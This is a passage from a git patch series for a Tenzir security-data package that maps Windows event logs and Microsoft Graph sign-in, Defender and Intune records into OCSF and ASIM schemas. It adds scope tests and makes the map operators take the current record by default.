microsoft::windows::ocsf::events::powershell_script_block + microsoft::windows::ocsf::events::powershell_script_block event=$event } 4104..4107 => { - microsoft::windows::ocsf::events::powershell_script_block_invocation + microsoft::windows::ocsf::events::powershell_script_block_invocation event=$event } 4624 => { - microsoft::windows::ocsf::events::logon + microsoft::windows::ocsf::events::logon event=$event } 4625 => { - microsoft::windows::ocsf::events::logon_failed + microsoft::windows::ocsf::events::logon_failed event=$event } 4648 => { - microsoft::windows::ocsf::events::explicit_credential_logon + microsoft::windows::ocsf::events::explicit_credential_logon event=$event } 4672 => { - microsoft::windows::ocsf::events::authorize_session + microsoft::windows::ocsf::events::authorize_session event=$event } 4688 => { - microsoft::windows::ocsf::events::process_create + microsoft::windows::ocsf::events::process_create event=$event } 4697 => { - microsoft::windows::ocsf::events::service_install + microsoft::windows::ocsf::events::service_install event=$event } 4698 => { - microsoft::windows::ocsf::events::scheduled_task_create + microsoft::windows::ocsf::events::scheduled_task_create event=$event } 4720 | 4721..4727 => { - microsoft::windows::ocsf::events::account_change + microsoft::windows::ocsf::events::account_change event=$event } 4726..4735 | 4753..4759 => { - microsoft::windows::ocsf::events::group_management + microsoft::windows::ocsf::events::group_management event=$event } 4769 => { - microsoft::windows::ocsf::events::kerberos_service_ticket + microsoft::windows::ocsf::events::kerberos_service_ticket event=$event } 4771 => { - microsoft::windows::ocsf::events::kerberos_preauth_failed + microsoft::windows::ocsf::events::kerberos_preauth_failed event=$event } 4776 => { - microsoft::windows::ocsf::events::ntlm_auth + microsoft::windows::ocsf::events::ntlm_auth event=$event } 5001 | 5007 => { - microsoft::windows::ocsf::events::defender_tamper + microsoft::windows::ocsf::events::defender_tamper event=$event } 6005 => { - microsoft::windows::ocsf::events::eventlog_start + microsoft::windows::ocsf::events::eventlog_start event=$event } 6006 => { - microsoft::windows::ocsf::events::eventlog_stop + microsoft::windows::ocsf::events::eventlog_stop event=$event } 7034 => { - microsoft::windows::ocsf::events::service_crashed + microsoft::windows::ocsf::events::service_crashed event=$event } 7045 => { - microsoft::windows::ocsf::events::service_install_scm + microsoft::windows::ocsf::events::service_install_scm event=$event } _ => { - microsoft::windows::ocsf::base + microsoft::windows::ocsf::base event=$event } } -drop windows.System.EventID +drop $event.windows.System.EventID -$event = {...ocsf, unmapped: windows} -drop windows, ocsf +$event = {...$event.ocsf, unmapped: $event.windows} diff --git a/microsoft/tests/asim/scope.tql b/microsoft/tests/asim/scope.tql new file mode 100644 index 0000000..9399fc5 --- /dev/null +++ b/microsoft/tests/asim/scope.tql @@ -0,0 +1,32 @@ +from { + outer: "keep", + ocsf: "outer-ocsf", + asim: { + Outer: "keep-asim", + }, + payload: { + activity_id: 1, + activity_name: "Logon", + category_uid: 3, + class_uid: 3002, + class_name: "Authentication", + type_uid: 300201, + type_name: "Authentication: Logon", + time: 2024-03-23T12:34:56Z, + severity_id: 1, + status: "Success", + metadata: { + product: { + name: "Windows", + vendor_name: "Microsoft", + }, + }, + user: { + name: "alice", + }, + device: { + hostname: "WINHOST01", + }, + }, +} +microsoft::asim::map event=payload diff --git a/microsoft/tests/asim/scope.txt b/microsoft/tests/asim/scope.txt new file mode 100644 index 0000000..2c99edc --- /dev/null +++ b/microsoft/tests/asim/scope.txt @@ -0,0 +1,38 @@ +{ + outer: "keep", + ocsf: "outer-ocsf", + asim: { + Outer: "keep-asim", + }, + payload: { + EventCount: 1, + EventStartTime: 2024-03-23T12:34:56Z, + EventEndTime: 2024-03-23T12:34:56Z, + EventProduct: "Windows", + EventVendor: "Microsoft", + EventOriginalType: "300201", + EventSeverity: "Informational", + EventResult: "Success", + Dvc: "WINHOST01", + DvcHostname: "WINHOST01", + DvcFQDN: "WINHOST01", + EventSchema: "Authentication", + EventSchemaVersion: "0.1.4", + EventType: "Logon", + ActorUsername: null, + ActorUserId: null, + ActorUserIdType: null, + ActorSessionId: null, + TargetUsername: "alice", + TargetUserId: null, + TargetUserIdType: null, + TargetSessionId: null, + SrcIpAddr: null, + SrcHostname: null, + SrcPortNumber: null, + TargetHostname: "WINHOST01", + TargetAppId: null, + TargetAppName: null, + LogonProtocol: null, + }, +} diff --git a/microsoft/tests/graph/ocsf/scope.tql b/microsoft/tests/graph/ocsf/scope.tql new file mode 100644 index 0000000..ed9f3ac --- /dev/null +++ b/microsoft/tests/graph/ocsf/scope.tql @@ -0,0 +1,38 @@ +from { + graph: "outer-graph", + ocsf: "outer-ocsf", + payload: { + id: "sign-in-scope", + tenantId: "tenant-1", + createdDateTime: 2024-03-23T12:34:56Z, + userId: "user-1", + userPrincipalName: "alice@example.com", + userDisplayName: "Alice Example", + appId: "app-1", + appDisplayName: "Example App", + resourceId: "resource-1", + resourceDisplayName: "Microsoft Graph", + ipAddress: 203.0.113.10, + location: { + city: "Berlin", + countryOrRegion: "DE", + }, + deviceDetail: { + operatingSystem: "Windows 11", + deviceId: "device-1", + }, + status: { + errorCode: 0, + failureReason: "Other.", + }, + mfaDetail: {}, + conditionalAccessStatus: "success", + isInteractive: true, + }, +} +@name = "microsoft.graph.sign_in" +microsoft::ocsf::map event=payload +select graph, + ocsf, + payload_class_uid=payload.class_uid, + payload_uid=payload.metadata.original_event_uid diff --git a/microsoft/tests/graph/ocsf/scope.txt b/microsoft/tests/graph/ocsf/scope.txt new file mode 100644 index 0000000..5da5033 --- /dev/null +++ b/microsoft/tests/graph/ocsf/scope.txt @@ -0,0 +1,6 @@ +{ + graph: "outer-graph", + ocsf: "outer-ocsf", + payload_class_uid: 3002, + payload_uid: "sign-in-scope", +} diff --git a/microsoft/tests/ocsf/scope-windows.tql b/microsoft/tests/ocsf/scope-windows.tql new file mode 100644 index 0000000..febfd4a --- /dev/null +++ b/microsoft/tests/ocsf/scope-windows.tql @@ -0,0 +1,11 @@ +from_file f"{env("TENZIR_INPUTS")}/eid-9999.xml" { + read_all +} +payload = data.parse_winlog() +windows = "outer-windows" +ocsf = "outer-ocsf" +microsoft::windows::ocsf::map event=payload +select windows, + ocsf, + payload_class_uid=payload.class_uid, + payload_event_code=payload.metadata.event_code diff --git a/microsoft/tests/ocsf/scope-windows.txt b/microsoft/tests/ocsf/scope-windows.txt new file mode 100644 index 0000000..d2981fb --- /dev/null +++ b/microsoft/tests/ocsf/scope-windows.txt @@ -0,0 +1,6 @@ +{ + windows: "outer-windows", + ocsf: "outer-ocsf", + payload_class_uid: 0, + payload_event_code: "9999", +} From 83054f92f7b85f9da30e31c86858d0e5c647b9c6 Mon Sep 17 00:00:00 2001 From: Matthias Vallentin Date: Fri, 12 Jun 2026 18:59:30 +0200 Subject: [PATCH 27/27] Default Microsoft maps to this Let the Microsoft public map UDOs use selector defaults for their event field parameter. Call sites that map the current record no longer need to spell out event=this, while nested selectors such as payload and win remain explicit. Assisted-by: GPT-5 (Codex) --- microsoft/examples/graph-defender-alerts-to-ocsf.tql | 2 +- microsoft/examples/graph-defender-incidents-to-ocsf.tql | 2 +- microsoft/examples/graph-directory-audits-to-ocsf.tql | 2 +- microsoft/examples/graph-intune-compliance-to-ocsf.tql | 2 +- microsoft/examples/graph-intune-detected-apps-to-ocsf.tql | 2 +- microsoft/examples/graph-intune-managed-devices-to-ocsf.tql | 2 +- microsoft/examples/graph-risk-detections-to-ocsf.tql | 2 +- microsoft/examples/graph-risky-users-to-ocsf.tql | 2 +- microsoft/examples/graph-sign-ins-to-asim.tql | 4 ++-- microsoft/examples/graph-sign-ins-to-ocsf.tql | 2 +- microsoft/examples/windows-event-log-to-asim.tql | 2 +- microsoft/operators/asim/map.tql | 1 + microsoft/operators/asim/ocsf/map.tql | 1 + microsoft/operators/graph/ocsf/map.tql | 1 + microsoft/operators/ocsf/map.tql | 1 + microsoft/operators/windows/ocsf/map.tql | 1 + microsoft/tests/asim/graph.tql | 4 ++-- microsoft/tests/asim/ocsf.tql | 2 +- microsoft/tests/asim/ocsf/account_change.tql | 2 +- microsoft/tests/asim/ocsf/authentication.tql | 2 +- microsoft/tests/asim/ocsf/detection_finding.tql | 2 +- microsoft/tests/asim/ocsf/dhcp_activity.tql | 2 +- microsoft/tests/asim/ocsf/dns_activity.tql | 2 +- microsoft/tests/asim/ocsf/event_log_activity.tql | 2 +- microsoft/tests/asim/ocsf/file_system_activity.tql | 2 +- microsoft/tests/asim/ocsf/group_management.tql | 2 +- microsoft/tests/asim/ocsf/http_activity.tql | 2 +- microsoft/tests/asim/ocsf/map.tql | 2 +- microsoft/tests/asim/ocsf/network_activity.tql | 2 +- microsoft/tests/asim/ocsf/process_activity.tql | 2 +- microsoft/tests/asim/windows.tql | 2 +- .../graph/ocsf/compliance-policy-setting-state-summaries.tql | 2 +- microsoft/tests/graph/ocsf/defender-alerts.tql | 2 +- microsoft/tests/graph/ocsf/defender-incidents.tql | 2 +- microsoft/tests/graph/ocsf/detected-apps.tql | 2 +- microsoft/tests/graph/ocsf/directory-audits.tql | 2 +- microsoft/tests/graph/ocsf/managed-devices.tql | 2 +- microsoft/tests/graph/ocsf/risk-detections.tql | 2 +- microsoft/tests/graph/ocsf/risky-users.tql | 2 +- microsoft/tests/graph/ocsf/sign-ins.tql | 2 +- 40 files changed, 42 insertions(+), 37 deletions(-) diff --git a/microsoft/examples/graph-defender-alerts-to-ocsf.tql b/microsoft/examples/graph-defender-alerts-to-ocsf.tql index 3b5189b..ae2bd8f 100644 --- a/microsoft/examples/graph-defender-alerts-to-ocsf.tql +++ b/microsoft/examples/graph-defender-alerts-to-ocsf.tql @@ -8,6 +8,6 @@ microsoft::graph::defender::alerts \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/examples/graph-defender-incidents-to-ocsf.tql b/microsoft/examples/graph-defender-incidents-to-ocsf.tql index 126f5a6..862f44c 100644 --- a/microsoft/examples/graph-defender-incidents-to-ocsf.tql +++ b/microsoft/examples/graph-defender-incidents-to-ocsf.tql @@ -9,7 +9,7 @@ every 5m { client_secret=secret("CLIENT_SECRET"), lookback=5m } -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-directory-audits-to-ocsf.tql b/microsoft/examples/graph-directory-audits-to-ocsf.tql index d4880e2..cf3498e 100644 --- a/microsoft/examples/graph-directory-audits-to-ocsf.tql +++ b/microsoft/examples/graph-directory-audits-to-ocsf.tql @@ -9,7 +9,7 @@ every 5m { client_secret=secret("CLIENT_SECRET"), lookback=5m } -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-compliance-to-ocsf.tql b/microsoft/examples/graph-intune-compliance-to-ocsf.tql index b0475dc..de4b6b2 100644 --- a/microsoft/examples/graph-intune-compliance-to-ocsf.tql +++ b/microsoft/examples/graph-intune-compliance-to-ocsf.tql @@ -8,7 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql index 7ff5f48..3277563 100644 --- a/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql +++ b/microsoft/examples/graph-intune-detected-apps-to-ocsf.tql @@ -8,7 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql index 01f0a72..4e0ef7f 100644 --- a/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql +++ b/microsoft/examples/graph-intune-managed-devices-to-ocsf.tql @@ -7,6 +7,6 @@ microsoft::graph::intune::managed_devices \ tenant_id="TENANT_ID", client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/examples/graph-risk-detections-to-ocsf.tql b/microsoft/examples/graph-risk-detections-to-ocsf.tql index c81613b..5b59ea1 100644 --- a/microsoft/examples/graph-risk-detections-to-ocsf.tql +++ b/microsoft/examples/graph-risk-detections-to-ocsf.tql @@ -8,7 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-risky-users-to-ocsf.tql b/microsoft/examples/graph-risky-users-to-ocsf.tql index 8396a6b..1c37ffd 100644 --- a/microsoft/examples/graph-risky-users-to-ocsf.tql +++ b/microsoft/examples/graph-risky-users-to-ocsf.tql @@ -8,7 +8,7 @@ every 5m { client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET") } -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast publish "ocsf" diff --git a/microsoft/examples/graph-sign-ins-to-asim.tql b/microsoft/examples/graph-sign-ins-to-asim.tql index 58b48a4..d9183fc 100644 --- a/microsoft/examples/graph-sign-ins-to-asim.tql +++ b/microsoft/examples/graph-sign-ins-to-asim.tql @@ -9,7 +9,7 @@ microsoft::graph::sign_ins \ client_secret=secret("CLIENT_SECRET"), lookback=5m @name = "microsoft.graph.sign_in" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast -microsoft::asim::map event=this +microsoft::asim::map diff --git a/microsoft/examples/graph-sign-ins-to-ocsf.tql b/microsoft/examples/graph-sign-ins-to-ocsf.tql index 396489c..7a1031a 100644 --- a/microsoft/examples/graph-sign-ins-to-ocsf.tql +++ b/microsoft/examples/graph-sign-ins-to-ocsf.tql @@ -8,6 +8,6 @@ microsoft::graph::sign_ins \ client_id="CLIENT_ID", client_secret=secret("CLIENT_SECRET"), lookback=5m -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/examples/windows-event-log-to-asim.tql b/microsoft/examples/windows-event-log-to-asim.tql index 92a7fe2..a76a0e9 100644 --- a/microsoft/examples/windows-event-log-to-asim.tql +++ b/microsoft/examples/windows-event-log-to-asim.tql @@ -13,4 +13,4 @@ win.raw_data_size = win.raw_data.length_bytes() this = win ocsf::derive ocsf::cast -microsoft::asim::map event=this +microsoft::asim::map diff --git a/microsoft/operators/asim/map.tql b/microsoft/operators/asim/map.tql index 526533d..446d785 100644 --- a/microsoft/operators/asim/map.tql +++ b/microsoft/operators/asim/map.tql @@ -5,6 +5,7 @@ args: - name: event description: The field that holds the OCSF event to map. type: field + default: this --- // If `ocsf::derive` and `ocsf::cast` gain `event=` support, this wrapper can diff --git a/microsoft/operators/asim/ocsf/map.tql b/microsoft/operators/asim/ocsf/map.tql index 2fda544..f0db161 100644 --- a/microsoft/operators/asim/ocsf/map.tql +++ b/microsoft/operators/asim/ocsf/map.tql @@ -5,6 +5,7 @@ args: - name: event description: The field that holds the OCSF event to map. type: field + default: this --- match $event.class_uid { diff --git a/microsoft/operators/graph/ocsf/map.tql b/microsoft/operators/graph/ocsf/map.tql index 1d78335..2e2b77a 100644 --- a/microsoft/operators/graph/ocsf/map.tql +++ b/microsoft/operators/graph/ocsf/map.tql @@ -5,6 +5,7 @@ args: - name: event description: The field that holds the Microsoft Graph event to map. type: field + default: this --- $event = {...$event, graph: $event, ocsf: {}} diff --git a/microsoft/operators/ocsf/map.tql b/microsoft/operators/ocsf/map.tql index bf71cc6..f876504 100644 --- a/microsoft/operators/ocsf/map.tql +++ b/microsoft/operators/ocsf/map.tql @@ -5,6 +5,7 @@ args: - name: event description: The field that holds the Microsoft event to map. type: field + default: this --- if $event.System? != null { diff --git a/microsoft/operators/windows/ocsf/map.tql b/microsoft/operators/windows/ocsf/map.tql index 7261389..a4f9099 100644 --- a/microsoft/operators/windows/ocsf/map.tql +++ b/microsoft/operators/windows/ocsf/map.tql @@ -5,6 +5,7 @@ args: - name: event description: The field that holds the structured Windows event to map. type: field + default: this --- $event = {...$event, windows: $event, ocsf: {}} diff --git a/microsoft/tests/asim/graph.tql b/microsoft/tests/asim/graph.tql index a23870f..51ec30d 100644 --- a/microsoft/tests/asim/graph.tql +++ b/microsoft/tests/asim/graph.tql @@ -2,9 +2,9 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { read_json } @name = "microsoft.graph.sign_in" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast -microsoft::asim::map event=this +microsoft::asim::map name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf.tql b/microsoft/tests/asim/ocsf.tql index 1b8dd42..11e19d8 100644 --- a/microsoft/tests/asim/ocsf.tql +++ b/microsoft/tests/asim/ocsf.tql @@ -30,5 +30,5 @@ from { ip: 10.0.0.1, }, } -microsoft::asim::map event=this +microsoft::asim::map name = @name diff --git a/microsoft/tests/asim/ocsf/account_change.tql b/microsoft/tests/asim/ocsf/account_change.tql index a99e0f5..3086449 100644 --- a/microsoft/tests/asim/ocsf/account_change.tql +++ b/microsoft/tests/asim/ocsf/account_change.tql @@ -36,5 +36,5 @@ from { }, } @name = "ocsf.account_change" -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map name = @name diff --git a/microsoft/tests/asim/ocsf/authentication.tql b/microsoft/tests/asim/ocsf/authentication.tql index d0ed7ed..056ddfc 100644 --- a/microsoft/tests/asim/ocsf/authentication.tql +++ b/microsoft/tests/asim/ocsf/authentication.tql @@ -143,6 +143,6 @@ from { }, } @name = "ocsf.authentication" -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/detection_finding.tql b/microsoft/tests/asim/ocsf/detection_finding.tql index 1b243e5..a63ba80 100644 --- a/microsoft/tests/asim/ocsf/detection_finding.tql +++ b/microsoft/tests/asim/ocsf/detection_finding.tql @@ -51,5 +51,5 @@ from { ], } @name = "ocsf.detection_finding" -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map name = @name diff --git a/microsoft/tests/asim/ocsf/dhcp_activity.tql b/microsoft/tests/asim/ocsf/dhcp_activity.tql index afaba70..473bb11 100644 --- a/microsoft/tests/asim/ocsf/dhcp_activity.tql +++ b/microsoft/tests/asim/ocsf/dhcp_activity.tql @@ -25,6 +25,6 @@ from { mac: "00:11:22:33:44:55", }, } -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/dns_activity.tql b/microsoft/tests/asim/ocsf/dns_activity.tql index f601bc8..34952ae 100644 --- a/microsoft/tests/asim/ocsf/dns_activity.tql +++ b/microsoft/tests/asim/ocsf/dns_activity.tql @@ -29,6 +29,6 @@ from { ip: 10.0.0.1, }, } -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/event_log_activity.tql b/microsoft/tests/asim/ocsf/event_log_activity.tql index 9a65f42..af795f7 100644 --- a/microsoft/tests/asim/ocsf/event_log_activity.tql +++ b/microsoft/tests/asim/ocsf/event_log_activity.tql @@ -39,5 +39,5 @@ from { }, } @name = "ocsf.event_log_activity" -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map name = @name diff --git a/microsoft/tests/asim/ocsf/file_system_activity.tql b/microsoft/tests/asim/ocsf/file_system_activity.tql index ef53ca8..ee39f7c 100644 --- a/microsoft/tests/asim/ocsf/file_system_activity.tql +++ b/microsoft/tests/asim/ocsf/file_system_activity.tql @@ -63,6 +63,6 @@ from { name: "invoice.pdf.exe", }, } -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/group_management.tql b/microsoft/tests/asim/ocsf/group_management.tql index b9df034..c7a004c 100644 --- a/microsoft/tests/asim/ocsf/group_management.tql +++ b/microsoft/tests/asim/ocsf/group_management.tql @@ -40,5 +40,5 @@ from { }, } @name = "ocsf.group_management" -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map name = @name diff --git a/microsoft/tests/asim/ocsf/http_activity.tql b/microsoft/tests/asim/ocsf/http_activity.tql index 93c2bac..d4af115 100644 --- a/microsoft/tests/asim/ocsf/http_activity.tql +++ b/microsoft/tests/asim/ocsf/http_activity.tql @@ -29,6 +29,6 @@ from { code: 200, }, } -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/map.tql b/microsoft/tests/asim/ocsf/map.tql index e6278b8..ba2cfc6 100644 --- a/microsoft/tests/asim/ocsf/map.tql +++ b/microsoft/tests/asim/ocsf/map.tql @@ -21,4 +21,4 @@ from { }, } @name = "ocsf.script_activity" -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map diff --git a/microsoft/tests/asim/ocsf/network_activity.tql b/microsoft/tests/asim/ocsf/network_activity.tql index 455919e..88fdce6 100644 --- a/microsoft/tests/asim/ocsf/network_activity.tql +++ b/microsoft/tests/asim/ocsf/network_activity.tql @@ -32,6 +32,6 @@ from { bytes_in: 200, }, } -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map name = @name sort EventOriginalUid diff --git a/microsoft/tests/asim/ocsf/process_activity.tql b/microsoft/tests/asim/ocsf/process_activity.tql index c99aad2..0758530 100644 --- a/microsoft/tests/asim/ocsf/process_activity.tql +++ b/microsoft/tests/asim/ocsf/process_activity.tql @@ -55,5 +55,5 @@ from { }, } @name = "ocsf.process_activity" -microsoft::asim::ocsf::map event=this +microsoft::asim::ocsf::map name = @name diff --git a/microsoft/tests/asim/windows.tql b/microsoft/tests/asim/windows.tql index db04bbc..e3b182d 100644 --- a/microsoft/tests/asim/windows.tql +++ b/microsoft/tests/asim/windows.tql @@ -8,5 +8,5 @@ win.raw_data_size = win.raw_data.length_bytes() this = win ocsf::derive ocsf::cast -microsoft::asim::map event=this +microsoft::asim::map name = @name diff --git a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql index 5d4e209..eda2e63 100644 --- a/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql +++ b/microsoft/tests/graph/ocsf/compliance-policy-setting-state-summaries.tql @@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/compliance-policy-setting-state-summari read_json } @name = "microsoft.graph.intune.compliance_policy_setting_state_summary" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-alerts.tql b/microsoft/tests/graph/ocsf/defender-alerts.tql index cf784ee..b597953 100644 --- a/microsoft/tests/graph/ocsf/defender-alerts.tql +++ b/microsoft/tests/graph/ocsf/defender-alerts.tql @@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-alerts.ndjson" { read_json } @name = "microsoft.graph.defender.alert" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/defender-incidents.tql b/microsoft/tests/graph/ocsf/defender-incidents.tql index e0c015e..d6ff2e3 100644 --- a/microsoft/tests/graph/ocsf/defender-incidents.tql +++ b/microsoft/tests/graph/ocsf/defender-incidents.tql @@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/defender-incidents.ndjson" { read_json } @name = "microsoft.graph.defender.incident" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast sort time, metadata.original_event_uid diff --git a/microsoft/tests/graph/ocsf/detected-apps.tql b/microsoft/tests/graph/ocsf/detected-apps.tql index 1637d4e..ef02388 100644 --- a/microsoft/tests/graph/ocsf/detected-apps.tql +++ b/microsoft/tests/graph/ocsf/detected-apps.tql @@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/detected-apps.ndjson" { read_json } @name = "microsoft.graph.intune.detected_app" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/directory-audits.tql b/microsoft/tests/graph/ocsf/directory-audits.tql index 95f4e46..973eafc 100644 --- a/microsoft/tests/graph/ocsf/directory-audits.tql +++ b/microsoft/tests/graph/ocsf/directory-audits.tql @@ -2,7 +2,7 @@ from_file f"{env("TENZIR_INPUTS")}/graph/directory-audits.ndjson" { read_json } @name = "microsoft.graph.directory_audit" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast sort time diff --git a/microsoft/tests/graph/ocsf/managed-devices.tql b/microsoft/tests/graph/ocsf/managed-devices.tql index 02f9820..1524afe 100644 --- a/microsoft/tests/graph/ocsf/managed-devices.tql +++ b/microsoft/tests/graph/ocsf/managed-devices.tql @@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/managed-devices.ndjson" { read_json } @name = "microsoft.graph.intune.managed_device" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risk-detections.tql b/microsoft/tests/graph/ocsf/risk-detections.tql index 444acb3..5fc5d4e 100644 --- a/microsoft/tests/graph/ocsf/risk-detections.tql +++ b/microsoft/tests/graph/ocsf/risk-detections.tql @@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risk-detections.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risk_detection" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/risky-users.tql b/microsoft/tests/graph/ocsf/risky-users.tql index c7ea153..8d9ac02 100644 --- a/microsoft/tests/graph/ocsf/risky-users.tql +++ b/microsoft/tests/graph/ocsf/risky-users.tql @@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/risky-users.ndjson" { read_json } @name = "microsoft.graph.identity_protection.risky_user" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast diff --git a/microsoft/tests/graph/ocsf/sign-ins.tql b/microsoft/tests/graph/ocsf/sign-ins.tql index 65d3fb8..2c86d79 100644 --- a/microsoft/tests/graph/ocsf/sign-ins.tql +++ b/microsoft/tests/graph/ocsf/sign-ins.tql @@ -2,6 +2,6 @@ from_file f"{env("TENZIR_INPUTS")}/graph/sign-ins.ndjson" { read_json } @name = "microsoft.graph.sign_in" -microsoft::ocsf::map event=this +microsoft::ocsf::map ocsf::derive ocsf::cast